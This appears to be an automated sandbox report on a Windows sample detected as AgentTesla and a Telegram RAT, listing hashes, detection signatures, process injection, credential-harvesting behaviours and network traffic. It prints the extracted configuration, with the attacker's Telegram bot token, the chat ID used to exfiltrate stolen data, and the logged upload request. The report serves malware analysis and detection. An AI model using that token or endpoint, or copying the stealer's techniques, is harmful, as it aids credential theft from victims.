Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
g0PWOnCNZH.exe

Overview

General Information

Sample Name:g0PWOnCNZH.exe
Original Sample Name:87be1ac6122ed0c75b3af80696b9e686.exe
Analysis ID:830729
MD5:87be1ac6122ed0c75b3af80696b9e686
SHA1:28954d7b81380a52dc012eb21c4769fe54070a5c
SHA256:de673c6577604d1036c5df6d67d9f5f9010eeb367a43ec7712b5614f70b725cd
Tags:32AgentTeslaexetrojan
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected Telegram RAT
Yara detected AgentTesla
Snort IDS alert for network traffic
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Uses the Telegram API (likely for C&C communication)
Machine Learning detection for sample
Allocates memory in foreign processes
May check the online IP address of the machine
Injects a PE file into a foreign processes
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
Uses a known web browser user agent for HTTP communication
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • g0PWOnCNZH.exe (PID: 5956 cmdline: C:\Users\user\Desktop\g0PWOnCNZH.exe MD5: 87BE1AC6122ED0C75B3AF80696B9E686)
    • RegSvcs.exe (PID: 6088 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe MD5: 2867A3817C9245F7CF518524DFD18F28)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based keylogger and RAT readily available to actors. Logs keystrokes and the host's clipboard and beacons this information back to the C2.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Malware Configuration

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot2134979594:AAFk4QkrlHlt2a-q-EhIoHZBbzxSH0QxiBI/sendMessage"}

Threatname: Agenttesla

{"Exfil Mode": "Telegram", "Telegram Url": "https://api.telegram.org/bot2134979594:AAFk4QkrlHlt2a-q-EhIoHZBbzxSH0QxiBI/sendMessage?chat_id=1295185895"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000002.524290015.00000000028EC000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    00000001.00000002.524290015.00000000028EC000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
      00000001.00000002.524290015.00000000028EC000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        Process Memory Space: RegSvcs.exe PID: 6088JoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          Process Memory Space: RegSvcs.exe PID: 6088JoeSecurity_TelegramRATYara detected Telegram RATJoe Security
            Click to see the 1 entries

            Sigma Signatures

            No Sigma rule has matched

            Snort Signatures

            Timestamp:192.168.2.3149.154.167.220496854432851779 03/20/23-16:41:25.765012
            SID:2851779
            Source Port:49685
            Destination Port:443
            Protocol:TCP
            Classtype:A Network Trojan was detected

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Multi AV Scanner detection for submitted file
            Source: g0PWOnCNZH.exeVirustotal: Detection: 43%Perma Link
            Source: g0PWOnCNZH.exeReversingLabs: Detection: 26%
            Machine Learning detection for sample
            Source: g0PWOnCNZH.exeJoe Sandbox ML: detected
            Source: 0.2.g0PWOnCNZH.exe.41c9fd0.11.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "Telegram", "Telegram Url": "https://api.telegram.org/bot2134979594:AAFk4QkrlHlt2a-q-EhIoHZBbzxSH0QxiBI/sendMessage?chat_id=1295185895"}
            Source: RegSvcs.exe.6088.1.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot2134979594:AAFk4QkrlHlt2a-q-EhIoHZBbzxSH0QxiBI/sendMessage"}
            Source: unknownHTTPS traffic detected: 64.185.227.155:443 -> 192.168.2.3:49684 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.3:49685 version: TLS 1.2
            Source: Binary string: HWrU.pdb source: g0PWOnCNZH.exe
            Source: Binary string: HWrU.pdbSHA256 source: g0PWOnCNZH.exe

            Networking

            barindex
            Snort IDS alert for network traffic
            Source: TrafficSnort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.3:49685 -> 149.154.167.220:443
            Uses the Telegram API (likely for C&C communication)
            Source: unknownDNS query: name: api.telegram.org
            May check the online IP address of the machine
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDNS query: name: api.ipify.org
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDNS query: name: api.ipify.org
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDNS query: name: api.ipify.org
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDNS query: name: api.ipify.org
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDNS query: name: api.ipify.org
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDNS query: name: api.ipify.org
            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: global trafficHTTP traffic detected: POST /bot2134979594:AAFk4QkrlHlt2a-q-EhIoHZBbzxSH0QxiBI/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8db2961f20f6dfcHost: api.telegram.orgContent-Length: 972Expect: 100-continueConnection: Keep-Alive
            Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
            Source: Joe Sandbox ViewIP Address: 64.185.227.155 64.185.227.155
            Source: Joe Sandbox ViewIP Address: 64.185.227.155 64.185.227.155
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49685
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49684
            Source: unknownNetwork traffic detected: HTTP traffic on port 49685 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49684 -> 443
            Source: RegSvcs.exe, 00000001.00000002.524290015.0000000002921000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
            Source: RegSvcs.exe, 00000001.00000002.523506282.0000000000D01000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
            Source: g0PWOnCNZH.exe, 00000000.00000002.297868542.0000000006F62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://fontfabrik.com
            Source: RegSvcs.exe, 00000001.00000002.524290015.00000000028A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: g0PWOnCNZH.exe, 00000000.00000002.297868542.0000000006F62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
            Source: g0PWOnCNZH.exe, 00000000.00000003.270701555.0000000005D50000.00000004.00000020.00020000.00000000.sdmp, g0PWOnCNZH.exe, 00000000.00000003.255937391.0000000005D5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.com
            Source: g0PWOnCNZH.exe, 00000000.00000003.255937391.0000000005D5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.comTC
            Source: g0PWOnCNZH.exe, 00000000.00000002.297868542.0000000006F62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
            Source: g0PWOnCNZH.exe, 00000000.00000002.297868542.0000000006F62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
            Source: g0PWOnCNZH.exe, 00000000.00000002.297868542.0000000006F62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
            Source: g0PWOnCNZH.exe, 00000000.00000002.297868542.0000000006F62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
            Source: g0PWOnCNZH.exe, 00000000.00000002.297868542.0000000006F62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
            Source: g0PWOnCNZH.exe, 00000000.00000002.297868542.0000000006F62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
            Source: g0PWOnCNZH.exe, 00000000.00000002.297868542.0000000006F62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
            Source: g0PWOnCNZH.exe, 00000000.00000002.297868542.0000000006F62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
            Source: g0PWOnCNZH.exe, 00000000.00000003.263731883.0000000005D55000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersB
            Source: g0PWOnCNZH.exe, 00000000.00000002.297868542.0000000006F62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
            Source: g0PWOnCNZH.exe, 00000000.00000002.275360961.0000000001517000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comgrito
            Source: g0PWOnCNZH.exe, 00000000.00000002.275360961.0000000001517000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.coml1
            Source: g0PWOnCNZH.exe, 00000000.00000002.275360961.0000000001517000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.como
            Source: g0PWOnCNZH.exe, 00000000.00000002.297868542.0000000006F62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
            Source: g0PWOnCNZH.exe, 00000000.00000003.253963556.0000000005D58000.00000004.00000020.00020000.00000000.sdmp, g0PWOnCNZH.exe, 00000000.00000002.297868542.0000000006F62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
            Source: g0PWOnCNZH.exe, 00000000.00000002.297868542.0000000006F62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
            Source: g0PWOnCNZH.exe, 00000000.00000002.297868542.0000000006F62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
            Source: g0PWOnCNZH.exe, 00000000.00000003.253963556.0000000005D58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cnD
            Source: g0PWOnCNZH.exe, 00000000.00000002.297868542.0000000006F62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
            Source: g0PWOnCNZH.exe, 00000000.00000002.297868542.0000000006F62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
            Source: g0PWOnCNZH.exe, 00000000.00000003.261346015.0000000005D55000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htmR
            Source: g0PWOnCNZH.exe, 00000000.00000002.297868542.0000000006F62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
            Source: g0PWOnCNZH.exe, 00000000.00000002.297868542.0000000006F62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
            Source: g0PWOnCNZH.exe, 00000000.00000003.261959194.0000000005D5B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.monotype.
            Source: g0PWOnCNZH.exe, 00000000.00000003.261959194.0000000005D5B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.monotype.U
            Source: g0PWOnCNZH.exe, 00000000.00000002.297868542.0000000006F62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
            Source: g0PWOnCNZH.exe, 00000000.00000003.252565247.0000000005D6B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com2
            Source: g0PWOnCNZH.exe, 00000000.00000003.252565247.0000000005D6B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.comTF
            Source: g0PWOnCNZH.exe, 00000000.00000003.252565247.0000000005D6B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.comiv
            Source: g0PWOnCNZH.exe, 00000000.00000003.252565247.0000000005D6B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.comq
            Source: g0PWOnCNZH.exe, 00000000.00000002.297868542.0000000006F62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
            Source: g0PWOnCNZH.exe, 00000000.00000002.297868542.0000000006F62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
            Source: g0PWOnCNZH.exe, 00000000.00000002.297868542.0000000006F62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
            Source: g0PWOnCNZH.exe, 00000000.00000003.254042499.0000000005D58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com(
            Source: g0PWOnCNZH.exe, 00000000.00000003.254042499.0000000005D5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.comw
            Source: g0PWOnCNZH.exe, 00000000.00000002.297868542.0000000006F62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
            Source: g0PWOnCNZH.exe, 00000000.00000002.297868542.0000000006F62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
            Source: g0PWOnCNZH.exe, 00000000.00000002.297868542.0000000006F62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
            Source: RegSvcs.exe, 00000001.00000002.524290015.00000000028A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org
            Source: RegSvcs.exe, 00000001.00000002.524290015.00000000028A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
            Source: RegSvcs.exe, 00000001.00000002.524290015.00000000028EC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
            Source: RegSvcs.exe, 00000001.00000002.524290015.00000000028A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot2134979594:AAFk4QkrlHlt2a-q-EhIoHZBbzxSH0QxiBI/
            Source: RegSvcs.exe, 00000001.00000002.524290015.00000000028EC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot2134979594:AAFk4QkrlHlt2a-q-EhIoHZBbzxSH0QxiBI/sendDocument
            Source: RegSvcs.exe, 00000001.00000002.524290015.00000000028EC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org4
            Source: unknownHTTP traffic detected: POST /bot2134979594:AAFk4QkrlHlt2a-q-EhIoHZBbzxSH0QxiBI/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8db2961f20f6dfcHost: api.telegram.orgContent-Length: 972Expect: 100-continueConnection: Keep-Alive
            Source: unknownDNS traffic detected: queries for: api.ipify.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
            Source: unknownHTTPS traffic detected: 64.185.227.155:443 -> 192.168.2.3:49684 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.3:49685 version: TLS 1.2
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeCode function: 0_2_014FA7200_2_014FA720
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeCode function: 0_2_014FA7800_2_014FA780
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeCode function: 0_2_014FC8440_2_014FC844
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeCode function: 0_2_014FF1E80_2_014FF1E8
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeCode function: 0_2_014FF1F80_2_014FF1F8
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeCode function: 0_2_073F99D80_2_073F99D8
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeCode function: 0_2_073F9DE80_2_073F9DE8
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeCode function: 0_2_073F03600_2_073F0360
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeCode function: 0_2_073F03500_2_073F0350
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeCode function: 0_2_073F3B450_2_073F3B45
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeCode function: 0_2_073F00B10_2_073F00B1
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeCode function: 0_2_073F00C00_2_073F00C0
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeCode function: 0_2_07B764780_2_07B76478
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeCode function: 0_2_07B7653D0_2_07B7653D
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeCode function: 0_2_07B7003A0_2_07B7003A
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeCode function: 0_2_07B764680_2_07B76468
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeCode function: 0_2_07B700400_2_07B70040
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00E9A9581_2_00E9A958
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00E9C9181_2_00E9C918
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00E99D401_2_00E99D40
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00E9A0881_2_00E9A088
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00E95A201_2_00E95A20
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0642DCB81_2_0642DCB8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0642AAF81_2_0642AAF8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0642EB501_2_0642EB50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_068DF2BB1_2_068DF2BB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_068D00401_2_068D0040
            Source: g0PWOnCNZH.exe, 00000000.00000002.275454005.0000000002E27000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCruiser.dll, vs g0PWOnCNZH.exe
            Source: g0PWOnCNZH.exe, 00000000.00000002.275454005.0000000002E27000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedde931e2-2d30-421f-8574-75b7b25b3267.exe4 vs g0PWOnCNZH.exe
            Source: g0PWOnCNZH.exe, 00000000.00000002.277978559.000000000419C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedde931e2-2d30-421f-8574-75b7b25b3267.exe4 vs g0PWOnCNZH.exe
            Source: g0PWOnCNZH.exe, 00000000.00000002.300220026.0000000007630000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameOutimurs.dll2 vs g0PWOnCNZH.exe
            Source: g0PWOnCNZH.exe, 00000000.00000002.277978559.0000000003F6A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameOutimurs.dll2 vs g0PWOnCNZH.exe
            Source: g0PWOnCNZH.exe, 00000000.00000000.249089263.0000000000A48000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameHWrU.exe> vs g0PWOnCNZH.exe
            Source: g0PWOnCNZH.exe, 00000000.00000002.277978559.0000000003DE9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameOutimurs.dll2 vs g0PWOnCNZH.exe
            Source: g0PWOnCNZH.exeBinary or memory string: OriginalFilenameHWrU.exe> vs g0PWOnCNZH.exe
            Source: g0PWOnCNZH.exeVirustotal: Detection: 43%
            Source: g0PWOnCNZH.exeReversingLabs: Detection: 26%
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\g0PWOnCNZH.exe C:\Users\user\Desktop\g0PWOnCNZH.exe
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\g0PWOnCNZH.exe.logJump to behavior
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/1@3/2
            Source: g0PWOnCNZH.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeMutant created: \Sessions\1\BaseNamedObjects\tzZlkogNkifmSNDNRsGiYwDEq
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: Binary string: HWrU.pdb source: g0PWOnCNZH.exe
            Source: Binary string: HWrU.pdbSHA256 source: g0PWOnCNZH.exe
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeCode function: 0_2_073F7060 push eax; ret 0_2_073F7309
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeCode function: 0_2_073F352E push ecx; iretd 0_2_073F352F
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeCode function: 0_2_073F34DD pushfd ; iretd 0_2_073F34E4
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeCode function: 0_2_073F391A pushad ; retf 0_2_073F3920
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeCode function: 0_2_073F2111 push B8FFFFE3h; iretd 0_2_073F211C
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeCode function: 0_2_073F3002 pushfd ; iretd 0_2_073F3007
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeCode function: 0_2_073F5889 pushfd ; retn 0000h0_2_073F588B
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeCode function: 0_2_07B73200 pushad ; iretd 0_2_07B73203
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00E90050 push edx; ret 1_2_00E9006A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00E9003D push edx; ret 1_2_00E9004A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00E90420 push edx; ret 1_2_00E9042A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00E90402 push edx; ret 1_2_00E9041A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00E90B58 push edx; ret 1_2_00E90E16
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_06421A68 push edx; ret 1_2_06421A76
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_06421950 push edx; ret 1_2_0642195E
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
